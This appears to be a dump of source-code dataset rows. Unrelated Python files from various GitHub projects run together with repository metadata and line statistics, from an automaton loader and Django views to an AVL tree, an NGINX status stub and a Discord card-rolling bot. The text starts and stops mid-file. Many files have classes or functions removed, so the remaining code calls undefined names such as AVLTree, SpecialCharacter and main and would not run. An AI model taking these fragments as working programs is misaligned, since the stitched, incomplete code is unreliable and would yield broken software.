state: str = str(transition[0])
raw_symbols: Union[any, Iterable[any]] = str(transition[1])
if isinstance(raw_symbols, str) or not isinstance(raw_symbols, collections.Iterable):
raw_symbols = [raw_symbols]
symbols: List[str] = list(map(lambda x: str(x), raw_symbols))
raw_next_states: Union[any, Iterable[any]] = transition[2]
if isinstance(raw_next_states, str) or not isinstance(raw_next_states, collections.Iterable):
raw_next_states = [raw_next_states]
next_states: List[str] = list(map(lambda x: str(x), raw_next_states))
for symbol in symbols:
if symbol.lower() == "epsilon" or symbol.lower() == "": # process epsilon
symbol = ""
for next_state in next_states:
machine.add_transition(state, symbol, next_state)
else:
raise IncompleteMachine("transitions", machine_type)
return machine
else:
raise UnsupportedMachine("{} is not a supported machine type!".format(machine_type))
def load_machine_from_file(path: str, machine_type: str = "", name: str = ""):
with open(path, "r") as f:
text = f.read()
return load_machine(text, machine_type, name)
| 36.644444 | 109 | 0.608854 |
54c1abcc8ecb4f60275606b22bbb22422b5b3be6 | 1,021 | py | Python | dashboard/frontend/callbacks.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 1 | 2022-03-06T23:50:34.000Z | 2022-03-06T23:50:34.000Z | dashboard/frontend/callbacks.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 4 | 2022-03-03T11:16:17.000Z | 2022-03-20T15:53:37.000Z | dashboard/frontend/callbacks.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | null | null | null | import dash
from dash.dependencies import Input, Output # type: ignore
import datetime
from treemap import generate_treemap, get_plot_data
from app import app
from store import store
| 31.90625 | 70 | 0.663075 |
54c3ac280575bb0ee6051627754ebf1784317751 | 4,095 | py | Python | tms/useraccount/views.py | csagar131/TicketManagementSystem | d2c6b340dcb1d7607257d88dc5b931a0624a774b | [
"Apache-2.0"
] | null | null | null | tms/useraccount/views.py | csagar131/TicketManagementSystem | d2c6b340dcb1d7607257d88dc5b931a0624a774b | [
"Apache-2.0"
] | 4 | 2021-06-04T23:51:17.000Z | 2022-02-10T10:41:21.000Z | tms/useraccount/views.py | csagar131/TicketManagementSystem | d2c6b340dcb1d7607257d88dc5b931a0624a774b | [
"Apache-2.0"
] | 1 | 2020-06-04T11:44:42.000Z | 2020-06-04T11:44:42.000Z | from django.shortcuts import render
from rest_framework.viewsets import ModelViewSet
from useraccount.serializer import UserSerializer,AgentUserSerializer
from rest_framework.views import APIView
from useraccount.models import User
from django.http.response import JsonResponse
from django.template.loader import render_to_string
from django.core.mail import send_mail
from rest_framework.authtoken.models import Token
from rest_framework.authentication import TokenAuthentication
from ticket.models import Organization
import random
import array
| 36.238938 | 114 | 0.60464 |
54c4b203b6a2600da692213b5eb8857816d71318 | 2,203 | py | Python | ppocr/utils/special_character.py | ZacksTsang/PaddleOCR | c716553f6f369d191b91690a81936a19173a7c33 | [
"Apache-2.0"
] | 1 | 2021-08-12T17:16:02.000Z | 2021-08-12T17:16:02.000Z | ppocr/utils/special_character.py | ZacksTsang/PaddleOCR | c716553f6f369d191b91690a81936a19173a7c33 | [
"Apache-2.0"
] | null | null | null | ppocr/utils/special_character.py | ZacksTsang/PaddleOCR | c716553f6f369d191b91690a81936a19173a7c33 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if __name__ == "__main__":
sp = SpecialCharacter({'special_character_dict_path': './special_character_dict.txt'})
print(sp.normalText('01'.decode('utf-8'))) | 43.196078 | 213 | 0.576033 |
54c4dc3efeaaf5e89758e47b3cc255b10a88682a | 1,160 | py | Python | setup.py | ionata/django-unique-uploadto | da66ed30d6abd86566d9b141e3c48b10340740a2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | ionata/django-unique-uploadto | da66ed30d6abd86566d9b141e3c48b10340740a2 | [
"BSD-3-Clause"
] | 1 | 2017-11-21T22:11:24.000Z | 2017-11-22T00:38:17.000Z | setup.py | ionata/django-unique-uploadto | da66ed30d6abd86566d9b141e3c48b10340740a2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from __future__ import absolute_import, print_function, unicode_literals
from setuptools import setup, find_packages
from unique_uploadto import __version__
with open('README.rst', 'r') as f:
readme = f.read()
setup(
name='django-unique-uploadto',
version=__version__,
description='Use a unique filename for django uploads',
long_description=readme,
author='Ionata Digital',
author_email='webmaster@ionata.com.au',
url='https://github.com/ionata/django-unique-uploadto',
license='BSD',
packages=find_packages(),
install_requires=[
'django>=1.8.0',
],
package_data={},
include_package_data=True,
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Framework :: Django',
],
)
| 27.619048 | 72 | 0.64569 |
54c84616a029f134346dc45645dd043f6f816a04 | 793 | py | Python | scripts/python/helper/decoration.py | sulthonzh/zaruba | ec9262f43da17d86330da2c593b7da451aabd60f | [
"Apache-2.0"
] | null | null | null | scripts/python/helper/decoration.py | sulthonzh/zaruba | ec9262f43da17d86330da2c593b7da451aabd60f | [
"Apache-2.0"
] | null | null | null | scripts/python/helper/decoration.py | sulthonzh/zaruba | ec9262f43da17d86330da2c593b7da451aabd60f | [
"Apache-2.0"
] | null | null | null | import random
normal="\033[0m"
bold="\033[1m"
faint="\033[2m"
italic="\033[3m"
underline="\033[4m"
blinkSlow="\033[5m"
blinkRapid="\033[6m"
inverse="\033[7m"
conceal="\033[8m"
crossedOut="\033[9m"
black="\033[30m"
red="\033[31m"
green="\033[32m"
yellow="\033[33m"
blue="\033[34m"
magenta="\033[35m"
cyan="\033[36m"
white="\033[37m"
bgBlack="\033[40m"
bgRed="\033[41m"
bgGreen="\033[42m"
bgYellow="\033[43m"
bgBlue="\033[44m"
bgMagenta="\033[45m"
bgCyan="\033[46m"
bgWhite="\033[47m"
noStyle="\033[0m"
noUnderline="\033[24m"
noInverse="\033[27m"
noColor="\033[39m"
| 20.333333 | 121 | 0.583859 |
49a498a0dfc278640dff975e47a36448f00bf3bc | 2,918 | py | Python | data_structures/tree/avl_tree.py | hongta/practice-python | 52d5278ea5402ea77054bfa5c4bfdbdf81c9c963 | [
"MIT"
] | null | null | null | data_structures/tree/avl_tree.py | hongta/practice-python | 52d5278ea5402ea77054bfa5c4bfdbdf81c9c963 | [
"MIT"
] | null | null | null | data_structures/tree/avl_tree.py | hongta/practice-python | 52d5278ea5402ea77054bfa5c4bfdbdf81c9c963 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from tree_node import AVLTreeNode
from binary_search_tree import BinarySearchTree
if __name__ == '__main__':
t = AVLTree()
t.insert(10)
t.insert(15)
t.insert(20)
t.insert(25)
t.insert(30)
p = t.search(20)
print p, p.left, p.right, p.height, p.parent
p = t.search(15)
print p, p.left, p.right, p.height, p.parent
p = t.search(25)
print p, p.left, p.right, p.height, p.parent
| 26.770642 | 78 | 0.59013 |
49a4e7b419d4d64776cdbda3fd3b82f70e450c6d | 96 | py | Python | ardget_app/apps.py | shumdeveloper/ardget | 585a93ce24e747014f2cbde8daae600e26fbd835 | [
"MIT"
] | null | null | null | ardget_app/apps.py | shumdeveloper/ardget | 585a93ce24e747014f2cbde8daae600e26fbd835 | [
"MIT"
] | null | null | null | ardget_app/apps.py | shumdeveloper/ardget | 585a93ce24e747014f2cbde8daae600e26fbd835 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 16 | 35 | 0.770833 |
49a74574e4d388966ade396ad88447197a6c63e8 | 1,944 | py | Python | dynamic_rest/datastructures.py | reinert/dynamic-rest | aaf3973f69b53ed317b9c8468942523715814fa8 | [
"MIT"
] | 690 | 2016-02-05T22:46:03.000Z | 2022-03-28T18:59:49.000Z | dynamic_rest/datastructures.py | reinert/dynamic-rest | aaf3973f69b53ed317b9c8468942523715814fa8 | [
"MIT"
] | 190 | 2015-03-06T16:57:21.000Z | 2022-02-02T21:56:07.000Z | dynamic_rest/datastructures.py | reinert/dynamic-rest | aaf3973f69b53ed317b9c8468942523715814fa8 | [
"MIT"
] | 117 | 2016-05-05T13:51:07.000Z | 2022-02-28T18:25:56.000Z | """This module contains custom data-structures."""
import six
| 29.907692 | 77 | 0.513374 |
49a7ee42b8f9f516686c7f73c30cfb6480597ce8 | 2,605 | py | Python | functions.py | heEXDe/password_generator | c546c09be927abc2a02971cab5f2d19817208cda | [
"MIT"
] | null | null | null | functions.py | heEXDe/password_generator | c546c09be927abc2a02971cab5f2d19817208cda | [
"MIT"
] | null | null | null | functions.py | heEXDe/password_generator | c546c09be927abc2a02971cab5f2d19817208cda | [
"MIT"
] | null | null | null | # functions for actions
import random
import string
import GUI
| 42.016129 | 103 | 0.571209 |
49a800c2275f46ea1981d8aa809ee37691f78025 | 1,330 | py | Python | lottery/branch/retrain.py | chenw23/open_lth | 2ce732fe48abd5a80c10a153c45d397b048e980c | [
"MIT"
] | 509 | 2020-05-07T16:45:46.000Z | 2022-03-28T13:41:36.000Z | lottery/branch/retrain.py | chenw23/open_lth | 2ce732fe48abd5a80c10a153c45d397b048e980c | [
"MIT"
] | 12 | 2020-06-10T10:07:09.000Z | 2022-02-03T01:57:32.000Z | lottery/branch/retrain.py | chenw23/open_lth | 2ce732fe48abd5a80c10a153c45d397b048e980c | [
"MIT"
] | 103 | 2020-05-07T21:40:06.000Z | 2022-03-11T19:07:55.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import datasets.registry
from foundations import hparams
from foundations.step import Step
from lottery.branch import base
import models.registry
from pruning.mask import Mask
from pruning.pruned_model import PrunedModel
from training import train
| 35.945946 | 118 | 0.72406 |
49a855768d0faa6b5929b201dd9c0e69c1e8d0cf | 1,860 | py | Python | Sumo_programs/probablyGoodCode/Lyall's_Test_File.py | senornosketchy/ENGG1000-R2R | 5c6880e81560079d22c8dbbadd9c7fdd1e585aa4 | [
"MIT"
] | null | null | null | Sumo_programs/probablyGoodCode/Lyall's_Test_File.py | senornosketchy/ENGG1000-R2R | 5c6880e81560079d22c8dbbadd9c7fdd1e585aa4 | [
"MIT"
] | null | null | null | Sumo_programs/probablyGoodCode/Lyall's_Test_File.py | senornosketchy/ENGG1000-R2R | 5c6880e81560079d22c8dbbadd9c7fdd1e585aa4 | [
"MIT"
] | null | null | null | """
Created on Thu Mar 22 15:07:43 2018
@author: Tanvee
First attempt at an program for the EV3 bot.
The main aim of this is to develop an algorithm to search clockwise for and identify
close objects, before rushing to meet them.
"""
print(0)
from time import sleep
import sys, os
# Import the ev3dev specific library
from ev3dev.ev3 import *
print(1)
# Connect motors
rightMotor = LargeMotor(OUTPUT_C)
assert rightMotor.connected
leftMotor = LargeMotor(OUTPUT_B)
assert leftMotor.connected
# Connect sensors
print(2)
tsRIGHT = TouchSensor(INPUT_3)
assert tsRIGHT.connected
tsLEFT = TouchSensor(INPUT_2)
assert tsLEFT.connected
us = UltrasonicSensor()
assert us.connected
cs = ColorSensor(INPUT_4)
assert cs.connected
print("All Connected")
# The gyro is reset when the mode is changed, so the first line is extra, just so we
# can change the mode the 'GYRO-ANGLE', which is what we want
# gs.mode = 'GYRO-RATE' # Changing the mode resets the gyro
# gs.mode = 'GYRO-ANG' # Set gyro mode to return compass angle
# We will need to check EV3 buttons state.
btn = Button()
# FUNCTION DEFINITIONS
def drive(left, right):
"""
Start both motors at the given speeds.
"""
leftMotor.run_direct(duty_cycle_sp=left)
rightMotor.run_direct(duty_cycle_sp=right)
"""
The default action is to spin around in an attempt to detect any object
within a certain radius using the ultrasonic sensor.
If the ultrasonic detects anything within 500mm the robot's reacts by "charging" at the object
"""
while True:
main()
| 21.882353 | 98 | 0.716667 |
49a87d079120bfbcccec5530adc7e03acb1cb9a1 | 13,984 | py | Python | tests/test_modelgen.py | PipGrylls/sqlalchemy-modelgen | 988e7b39fa4f8b2ddac35792c21e147e8260df17 | [
"MIT"
] | 18 | 2021-04-01T20:32:42.000Z | 2021-06-01T05:24:27.000Z | tests/test_modelgen.py | PipGrylls/sqlalchemy-modelgen | 988e7b39fa4f8b2ddac35792c21e147e8260df17 | [
"MIT"
] | null | null | null | tests/test_modelgen.py | PipGrylls/sqlalchemy-modelgen | 988e7b39fa4f8b2ddac35792c21e147e8260df17 | [
"MIT"
] | 1 | 2021-11-23T01:17:18.000Z | 2021-11-23T01:17:18.000Z | from unittest import TestCase, mock
from modelgen import ModelGenerator, Base
from os import getcwd, path | 44.820513 | 101 | 0.661971 |
49a8f69931a09da4e91b5822491e86963189f463 | 223 | py | Python | papermerge/apps/e_invoice/apps.py | francescocarzaniga/e_invoice_papermerge | e7a4a3fdab4263c02983b638f873db8d11e89041 | [
"Apache-2.0"
] | 1 | 2021-02-15T06:38:32.000Z | 2021-02-15T06:38:32.000Z | papermerge/apps/e_invoice/apps.py | francescocarzaniga/e_invoice_papermerge | e7a4a3fdab4263c02983b638f873db8d11e89041 | [
"Apache-2.0"
] | null | null | null | papermerge/apps/e_invoice/apps.py | francescocarzaniga/e_invoice_papermerge | e7a4a3fdab4263c02983b638f873db8d11e89041 | [
"Apache-2.0"
] | 1 | 2021-02-15T06:38:35.000Z | 2021-02-15T06:38:35.000Z | from django.apps import AppConfig
# def ready(self):
# from papermerge.apps.data_retention import signals # noqa
| 22.3 | 67 | 0.713004 |
49a92b917ad9d386c28bdce310accefac0f211c6 | 2,075 | py | Python | handler_loud/chat.py | ross/simone | cfee8eaa04a7ddd235f735fa6c07adac28b4c6a4 | [
"MIT"
] | null | null | null | handler_loud/chat.py | ross/simone | cfee8eaa04a7ddd235f735fa6c07adac28b4c6a4 | [
"MIT"
] | 1 | 2021-11-04T13:47:28.000Z | 2021-11-04T13:47:28.000Z | handler_loud/chat.py | ross/simone | cfee8eaa04a7ddd235f735fa6c07adac28b4c6a4 | [
"MIT"
] | 1 | 2021-10-20T14:44:19.000Z | 2021-10-20T14:44:19.000Z | from logging import getLogger
from random import randrange
import re
from simone.handlers import Registry, exclude_private
from .models import Shout
# Based loosely on https://github.com/desert-planet/hayt/blob/master/scripts/loud.coffee
Registry.register_handler(Loud())
| 33.467742 | 88 | 0.578313 |
49a9a3178fb4042aad889e7fe746a420d38ecae5 | 1,013 | py | Python | Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | f523e5c94d582328b3edc449ea16ac6ab28cdc81 | [
"Unlicense"
] | 3,269 | 2018-10-12T01:29:40.000Z | 2022-03-31T17:58:41.000Z | Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | f523e5c94d582328b3edc449ea16ac6ab28cdc81 | [
"Unlicense"
] | 53 | 2018-12-16T22:54:20.000Z | 2022-02-25T08:31:20.000Z | Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | f523e5c94d582328b3edc449ea16ac6ab28cdc81 | [
"Unlicense"
] | 1,236 | 2018-10-12T02:51:40.000Z | 2022-03-30T13:30:37.000Z | # Time: O(|V| + |E|)
# Space: O(|V|)
# """
# This is HtmlParser's API interface.
# You should not implement it, or speculate about its implementation
# """
| 25.325 | 69 | 0.515301 |
49aa6dbb7d625a529dc7cc00fc711016b4a758db | 3,614 | py | Python | scripts/collect.py | oveis/DeepVideoFaceSwap | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | [
"MIT"
] | 5 | 2019-05-17T11:54:04.000Z | 2020-10-06T18:45:17.000Z | scripts/collect.py | oveis/DeepVideoFaceSwap | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | [
"MIT"
] | null | null | null | scripts/collect.py | oveis/DeepVideoFaceSwap | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | [
"MIT"
] | 5 | 2019-06-05T00:20:24.000Z | 2019-09-15T15:40:23.000Z | #!/usr/bin python3
""" The script to collect training data """
import logging
import os
import cv2 as cv
import numpy as np
from google_images_download import google_images_download as gid
from lib.utils import get_folder
from os.path import exists, isfile, join
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
FRONT_FACE_CASCADE = cv.CascadeClassifier('scripts/haarcascades/haarcascade_frontalface_default.xml')
PROFILE_FACE_CASCADE = cv.CascadeClassifier('scripts/haarcascades/haarcascade_profileface.xml')
# TODO: Need a function to put images in S3 bucket.
# TODO: Retrieve face images from a given video file. | 36.505051 | 104 | 0.649972 |
49aacdd586494ba24976083e9c7c711f99d594ea | 1,132 | py | Python | data_split.py | TalSchuster/FewRel | af68f52b13977ca29808c38a54995363f76cdcad | [
"MIT"
] | null | null | null | data_split.py | TalSchuster/FewRel | af68f52b13977ca29808c38a54995363f76cdcad | [
"MIT"
] | null | null | null | data_split.py | TalSchuster/FewRel | af68f52b13977ca29808c38a54995363f76cdcad | [
"MIT"
] | null | null | null | import os
import random
from shutil import copyfile
import json
random.seed(123)
ROOT_PATH = './data/'
k = 5
target_path = './data/wiki_5_splits/'
'''
Splits the training set to 5 folds.
In each split, the held out set is used for test.
'''
path = os.path.join(ROOT_PATH, 'train_wiki' + '.json')
data = json.load(open(path, 'r'))
relations = list(data.keys())
num_relations = len(relations)
rels_per_split = round(num_relations / k)
random.shuffle(relations)
for i in range(k):
split_val_rels = relations[i*rels_per_split: (i+1)*rels_per_split]
split_train = {}
split_val = {}
for rel, examples in data.items():
if rel in split_val_rels:
split_val[rel] = examples
else:
split_train[rel] = examples
print(f"split {i}: train: {len(split_val.keys())}, test: {len(split_train.keys())}")
os.makedirs(os.path.join(target_path, str(i)), exist_ok=True)
with open(os.path.join(target_path, str(i), 'train.json'), 'w') as f:
json.dump(split_train, f)
with open(os.path.join(target_path, str(i), 'val.json'), 'w') as f:
json.dump(split_val, f)
| 25.155556 | 88 | 0.655477 |
49aaf3536a9b3013f2535a7951571b5299a8099f | 604 | py | Python | heisen/core/__init__.py | HeisenCore/heisen | 0cd4d27822960553a8e83a72c7dfeefa76e65c06 | [
"MIT"
] | 5 | 2016-08-30T07:51:08.000Z | 2021-09-13T11:30:05.000Z | heisen/core/__init__.py | HeisenCore/heisen | 0cd4d27822960553a8e83a72c7dfeefa76e65c06 | [
"MIT"
] | 15 | 2016-09-15T19:21:24.000Z | 2016-10-22T16:22:15.000Z | heisen/core/__init__.py | HeisenCore/heisen | 0cd4d27822960553a8e83a72c7dfeefa76e65c06 | [
"MIT"
] | null | null | null | from heisen.config import settings
from jsonrpclib.request import ConnectionPool
rpc_call = get_rpc_connection()
| 27.454545 | 80 | 0.692053 |
49abd960ef01b21e1a602cfce947ec5f7f32f14e | 3,182 | py | Python | pychron/processing/analysis_graph.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
] | null | null | null | pychron/processing/analysis_graph.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
] | 20 | 2020-09-09T20:58:39.000Z | 2021-10-05T17:48:37.000Z | pychron/processing/analysis_graph.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
] | null | null | null | # ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Event
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.graph.graph import Graph
from pychron.graph.stacked_graph import StackedGraph
from pychron.graph.stacked_regression_graph import StackedRegressionGraph
# ============= EOF =============================================
| 33.851064 | 100 | 0.653363 |
49ac5028ee971f3e584f2c491889fc4e4b16901b | 3,023 | py | Python | stub/nginx-status-stub.py | geld-tech/nginx-monitor-dashboard | 3fcd3bd184a0348095c4f4ec91a46ab98ee0ca80 | [
"Apache-2.0"
] | 1 | 2018-07-30T14:01:36.000Z | 2018-07-30T14:01:36.000Z | stub/nginx-status-stub.py | geld-tech/nginx-monitor-dashboard | 3fcd3bd184a0348095c4f4ec91a46ab98ee0ca80 | [
"Apache-2.0"
] | null | null | null | stub/nginx-status-stub.py | geld-tech/nginx-monitor-dashboard | 3fcd3bd184a0348095c4f4ec91a46ab98ee0ca80 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
NGINX Status Stub
Returns sample resources usage
"""
import logging
import logging.handlers
import random
from optparse import OptionParser
from flask import Flask
app = Flask(__name__)
app.debug = True
# Initialisation
logging.basicConfig(format='[%(asctime)-15s] [%(threadName)s] %(levelname)s %(message)s', level=logging.INFO)
logger = logging.getLogger('root')
if __name__ == "__main__":
# Parse options
opts_parser = OptionParser()
opts_parser.add_option('--port', type="int", dest='port', help='IP Port to listen to.', default=8000)
opts_parser.add_option('--debug', action='store_true', dest='debug', help='Print verbose output.', default=False)
options, args = opts_parser.parse_args()
if options.debug:
logger.setLevel(logging.DEBUG)
logger.debug('Enabled DEBUG logging level.')
logger.info('Options parsed')
app.run(host='0.0.0.0', port=options.port)
| 50.383333 | 1,124 | 0.700629 |
49ad0529acc7b30e818083fbddf61cedb7ec9149 | 1,616 | py | Python | test_question4.py | fmakawa/Practice | 7f6eaa1dde4e46088ca5dcee76de1bb56a363238 | [
"MIT"
] | null | null | null | test_question4.py | fmakawa/Practice | 7f6eaa1dde4e46088ca5dcee76de1bb56a363238 | [
"MIT"
] | null | null | null | test_question4.py | fmakawa/Practice | 7f6eaa1dde4e46088ca5dcee76de1bb56a363238 | [
"MIT"
] | null | null | null | """
Question 4
Level 1
Question:
Write a program which accepts a sequence of comma-separated numbers from console and generate a list and a tuple which contains every number.
Suppose the following input is supplied to the program:
34,67,55,33,12,98
Then, the output should be:
['34', '67', '55', '33', '12', '98']
('34', '67', '55', '33', '12', '98')
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.
tuple() method can convert list to tuple
"""
import unittest
from unittest.mock import patch
from question4 import listicle, tuplicle, listpicle
suite = unittest.TestLoader().loadTestsFromTestCase(TestDict)
unittest.TextTestRunner(verbosity=2).run(suite)
| 36.727273 | 141 | 0.61448 |
49ad08a13c544d4263d6239603d117433df3bf65 | 53 | py | Python | src/poliastro/_math/integrate.py | DhruvJ22/poliastro | ac5fafc6d054b2c545e111e5a6aa32259998074a | [
"MIT"
] | 8 | 2015-05-09T17:21:57.000Z | 2020-01-28T06:59:18.000Z | src/poliastro/_math/integrate.py | DhruvJ22/poliastro | ac5fafc6d054b2c545e111e5a6aa32259998074a | [
"MIT"
] | 4 | 2015-12-29T13:08:01.000Z | 2019-12-27T12:58:04.000Z | src/poliastro/_math/integrate.py | DhruvJ22/poliastro | ac5fafc6d054b2c545e111e5a6aa32259998074a | [
"MIT"
] | 1 | 2016-10-05T08:34:44.000Z | 2016-10-05T08:34:44.000Z | from scipy.integrate import quad
__all__ = ["quad"]
| 13.25 | 32 | 0.735849 |
49ad2866726183e18afb70540beb33954b2be143 | 543 | py | Python | app/tasks/uwu/uwu.py | tahosa/discord-util-bot | 2f261c5ae06da8a62e72502b53341720437860f5 | [
"MIT"
] | null | null | null | app/tasks/uwu/uwu.py | tahosa/discord-util-bot | 2f261c5ae06da8a62e72502b53341720437860f5 | [
"MIT"
] | null | null | null | app/tasks/uwu/uwu.py | tahosa/discord-util-bot | 2f261c5ae06da8a62e72502b53341720437860f5 | [
"MIT"
] | 1 | 2022-02-09T04:16:54.000Z | 2022-02-09T04:16:54.000Z | import logging
import discord
import discord.ext.commands as commands
_LOG = logging.getLogger('discord-util').getChild("uwu")
| 31.941176 | 110 | 0.685083 |
49add70868769fd8f813dafc8912a925207ca004 | 4,011 | py | Python | rocket.py | FrCln/SpaceGarbage | 0e121143888b108eac2b86b1dd9fcbf20dcef36e | [
"MIT"
] | null | null | null | rocket.py | FrCln/SpaceGarbage | 0e121143888b108eac2b86b1dd9fcbf20dcef36e | [
"MIT"
] | null | null | null | rocket.py | FrCln/SpaceGarbage | 0e121143888b108eac2b86b1dd9fcbf20dcef36e | [
"MIT"
] | null | null | null | import math
import os
from curses_tools import draw_frame, get_frame_size
def _limit(value, min_value, max_value):
"""Limit value by min_value and max_value."""
if value < min_value:
return min_value
if value > max_value:
return max_value
return value
def _apply_acceleration(speed, speed_limit, forward=True):
"""Change speed accelerate or brake according to force direction."""
speed_limit = abs(speed_limit)
speed_fraction = speed / speed_limit
# ,
# ,
delta = math.cos(speed_fraction) * 0.75
if forward:
result_speed = speed + delta
else:
result_speed = speed - delta
result_speed = _limit(result_speed, -speed_limit, speed_limit)
# ,
if abs(result_speed) < 0.1:
result_speed = 0
return result_speed
| 31.335938 | 115 | 0.607828 |
49ae3d28975be04fc1299eea9d4febbbbbb376de | 7,963 | py | Python | src/roll.py | SimonPerche/PersonalitiesWars | 495803a5be5e9fde572c3f39086d8a3510c75f58 | [
"MIT"
] | null | null | null | src/roll.py | SimonPerche/PersonalitiesWars | 495803a5be5e9fde572c3f39086d8a3510c75f58 | [
"MIT"
] | null | null | null | src/roll.py | SimonPerche/PersonalitiesWars | 495803a5be5e9fde572c3f39086d8a3510c75f58 | [
"MIT"
] | 1 | 2022-03-08T22:07:50.000Z | 2022-03-08T22:07:50.000Z | import secrets
import asyncio
from datetime import datetime, timedelta
import discord
from discord.ext import commands
from database import DatabasePersonality, DatabaseDeck
#### Utilities functions ####
def min_until_next_claim(id_server, id_user):
"""Return minutes until next claim (0 if the user can claim now)."""
last_claim = DatabaseDeck.get().get_last_claim(id_server, id_user)
time_until_claim = 0
if last_claim:
claim_interval = DatabaseDeck.get().get_server_configuration(id_server)['claim_interval']
date_last_claim = datetime.strptime(last_claim, '%Y-%m-%d %H:%M:%S')
minute_since_last_claim = int(divmod((datetime.now() - date_last_claim).total_seconds(), 60)[0])
if minute_since_last_claim < claim_interval:
time_until_claim = claim_interval - minute_since_last_claim
return time_until_claim
def min_until_next_roll(id_server, id_user):
"""Return minutes until next roll (0 if the user can roll now)."""
last_roll = DatabaseDeck.get().get_last_roll(id_server, id_user)
if not last_roll:
return 0
last_roll = datetime.strptime(last_roll, '%Y-%m-%d %H:%M:%S')
now = datetime.now()
# If a new hour began
if now.date() != last_roll.date() or (now.date() == last_roll.date() and now.hour != last_roll.hour):
DatabaseDeck.get().set_nb_rolls(id_server, id_user, 0)
return 0
max_rolls = DatabaseDeck.get().get_rolls_per_hour(id_server)
user_nb_rolls = DatabaseDeck.get().get_nb_rolls(id_server, id_user)
if user_nb_rolls < max_rolls:
return 0
else:
return 60 - now.minute
| 41.259067 | 154 | 0.615346 |
49ae4cab0439ba556dfe9b168c615e0466cf0551 | 2,195 | py | Python | test.py | mltnhm/sr-turtle | d839eeb50e4ba70cfc2a4070c9f6fda2f0b19ca2 | [
"MIT"
] | 1 | 2020-04-16T18:06:13.000Z | 2020-04-16T18:06:13.000Z | test.py | mltnhm/sr-turtle | d839eeb50e4ba70cfc2a4070c9f6fda2f0b19ca2 | [
"MIT"
] | 3 | 2019-05-11T20:39:31.000Z | 2019-11-13T10:51:59.000Z | test.py | mltnhm/sr-turtle | d839eeb50e4ba70cfc2a4070c9f6fda2f0b19ca2 | [
"MIT"
] | 1 | 2019-11-12T08:02:52.000Z | 2019-11-12T08:02:52.000Z | from __future__ import print_function
import time
from sr.robot import *
SEARCHING = "SEARCHING"
DRIVING = "DRIVING"
R = Robot()
state = SEARCHING
while True:
if state == SEARCHING:
print("Searching for gold tokens...")
tokens = get_gold_tokens()
print(tokens)
if len(tokens) > 0:
m = tokens[0]
# TODO: Pick the closest token, not just any token.
print("Token sighted. {0} is {1}m away, bearing {2} degrees." \
.format(m.info.offset, m.dist, m.rot_y))
state = DRIVING
else:
print("Can't see anything.")
turn(25, 0.3)
time.sleep(0.2)
elif state == DRIVING:
print("Aligning...")
tokens = get_gold_tokens()
if len(tokens) == 0:
state = SEARCHING
else:
m = tokens[0]
if m.dist < 0.4:
print("Found it!")
if R.grab():
print("Gotcha!")
turn(50, 0.5)
drive(50, 1)
R.release()
drive(-50, 0.5)
else:
print("Aww, I'm not close enough.")
exit()
elif -15 <= m.rot_y <= 15:
print("Ah, that'll do.")
drive(50, 0.5)
elif m.rot_y < -15:
print("Left a bit...")
turn(-12.5, 0.5)
elif m.rot_y > 15:
print("Right a bit...")
turn(12.5, 0.5)
| 25.229885 | 75 | 0.491116 |
49aebc3c829e124d35af1e1fc14ed2a19ad3ba06 | 9,218 | py | Python | ATIVIDAS UF/exemplos.py | alverad-katsuro/Python | 6ba3cc604fd9cde3ee012fcf17bbf6cd944e8c38 | [
"MIT"
] | null | null | null | ATIVIDAS UF/exemplos.py | alverad-katsuro/Python | 6ba3cc604fd9cde3ee012fcf17bbf6cd944e8c38 | [
"MIT"
